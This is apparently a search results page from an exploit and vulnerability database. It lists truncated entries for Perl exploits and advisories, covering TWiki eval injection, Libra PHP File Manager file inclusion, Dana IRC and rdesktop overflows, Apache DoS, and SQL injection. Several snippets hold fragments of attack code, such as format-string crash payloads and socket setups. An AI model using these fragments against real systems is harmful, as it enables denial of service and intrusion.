274 matches found
TWiki < 4.2.4 Multiple XSS / Command Execution Vulnerabilities
TWiki is prone to multiple cross-site scripting XSS and command execution vulnerabilities. SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE ...
CVE-2008-5305
Eval injection vulnerability in TWiki before 4.2.4 allows remote attackers to execute arbitrary Perl code via the %SEARCH% variable...
CVE-2008-5305
Eval injection vulnerability in TWiki before 4.2.4 allows remote attackers to execute arbitrary Perl code via the %SEARCH% variable...
Libra PHP File Manager <= 1.18 Local File Inclusion Exploit
No description provided by source. ! /usr/bin/perl -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Libra PHP File Manager = 1.18 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Program: Libra PHP File Manager Version: =...
Libra PHP File Manager 1.182.0 - Local File Inclusion
Libra PHP File Manager 1.182.0 - Local File Inclusion ! /usr/bin/perl -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Libra PHP File Manager eNYe-Sec - www.enye-sec.org Greetings to Ka0x for help me with the perl code : You can scale directories and read any file that you have...
Libra PHP File Manager <= 1.18/2.0 Local File Inclusion Exploit
Exploit for unknown platform in category web applications =============================================================== Libra PHP File Manager eNYe-Sec - www.enye-sec.org Greetings to Ka0x for help me with the perl code : You can scale directories and read any file that you have permissions use...
Libra PHP File Manager 1.18/2.0 - Local File Inclusion
!/usr/bin/perl -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Libra PHP File Manager eNYe-Sec - www.enye-sec.org Greetings to Ka0x for help me with the perl code : You can scale directories and read any file that you have permissions use LWP::UserAgent; $ua =...
Gentoo Security Advisory GLSA 200508-07 (awstats)
The remote host is missing updates announced in advisory GLSA 200508-07. OpenVAS Vulnerability Test $ Description: Auto generated from Gentoo's XML based advisory Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc. http://www.securityspace.com Text descriptions are largely excerpted fr...
Gentoo Security Advisory GLSA 200508-07 (awstats)
The remote host is missing updates announced in advisory GLSA 200508-07. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Aeon 0.2a Local Linux Exploit (perl code)
No description provided by source. !/usr/bin/perl Aeon-mail relay agent for Linux written by lammat just for practice purposes tested against aeon-0.2a http://grpower.ath.cx [email protected] execve/bin/sh for linux x86 29 bytes by Matias Sedalo $shellcode =...
Neutrino 0.8.4 Atomic Edition Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl Neutrino 0.8.4 Atomic Edition Perl exploit discovered & written by Ams [email protected] DESCRIPTION: First exploit destroys "/data/sess.php" file simply strips tags, then we are able to bypass authorization and using admin privelegies our exploit...
Apache 2.0.52 Multiple Space Header DoS (Perl code)
No description provided by source. !/usr/bin/perl Noam Rathaus of Beyond Security Ltd. use strict; use IO::Socket::INET; usage unless @ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; my $socket = IO::Socket::INET-newproto='tcp', PeerAddr=$host, PeerPort=$port;...
danairc-dos.txt
Dana IRC new Proto = 'tcp', LocalPort = '6667', Listen = SOMAXCONN, Reuse = 1 ; $jnk = "%n"x1000; print "Running.."; while$client = $sock-accept print $client "$jnk\r\n"; print "Crashed Client!\n";...
Dana IRC <= 1.3 Remote Buffer Overflow PoC
No description provided by source. - Dana IRC = 1.3 Remote Buffer Overflow POC/Crash - Discovered On: 14 JUNE 2008 Discovered By: t0pP8uZz Download: diebestenbits.de - Info - Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k overwrites the EIP therefor crashes t...
Dana IRC 1.3 - Remote Buffer Overflow (PoC)
Dana IRC 1.3 - Remote Buffer Overflow PoC - Dana IRC new Proto = 'tcp', LocalPort = '6667', Listen = SOMAXCONN, Reuse = 1 ; $jnk = "%n"x1000; print "Running.."; while$client = $sock-accept print $client "$jnk\r\n"; print "Crashed Client!\n"; milw0rm.com 2008-06-14...
rdesktoppdu-overflow.txt
!/usr/bin/perl http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '3389', Listen = 1, Reuse = 1 || die$!; my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38"...
F5 BIG-IP管理接口NEW_VALUE参数远程代码注入漏洞
BUGTRAQ ID: 28639 F5 BIG-IP是集成了网络流量管理、应用程序安全管理器、负载均衡等功能的多合一网络设备。 BIG-IP的配置工具实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在系统上执行任意命令。 Web管理接口和CLI所使用的F5 BIG-IP重新配置工具没有正确地过滤某些重新配置请求,如果登录用户拥有Resource Manager或Administrator权限的话,就可以注入任意Perl代码,生成Unix shell命令并以root用户权限执行。 这个漏洞的起因是未经转义NEWVALUE中的单引号便使用了包含有类似于以下内容模板的Perl EP3:...
KAPhotoservice (album.asp) Remote SQL Injection Exploit
No description provided by source. --==+=================== Spanish Hackers Team www.spanish-hackers.com =================+==-- --==+ KAPhotoservice album.asp Remote SQL Injection Exploit +==-- --==+====================================================================================+==-- + JosS +...
Debian Security Advisory DSA 1239-1 (sql-ledger)
The remote host is missing an update to sql-ledger announced via advisory DSA 1239-1. Several remote vulnerabilities have been discovered in SQL Ledger, a web based double-entry accounting program, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project...
Yarssr 0.2.2 - GUI.PM Remote Code Injection
Yarssr 0.2.2 - GUI.PM Remote Code Injection source: www.securityfocus.com/bid/26273/info Yarssr is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to inject and execute arbitrary malicious Perl code with...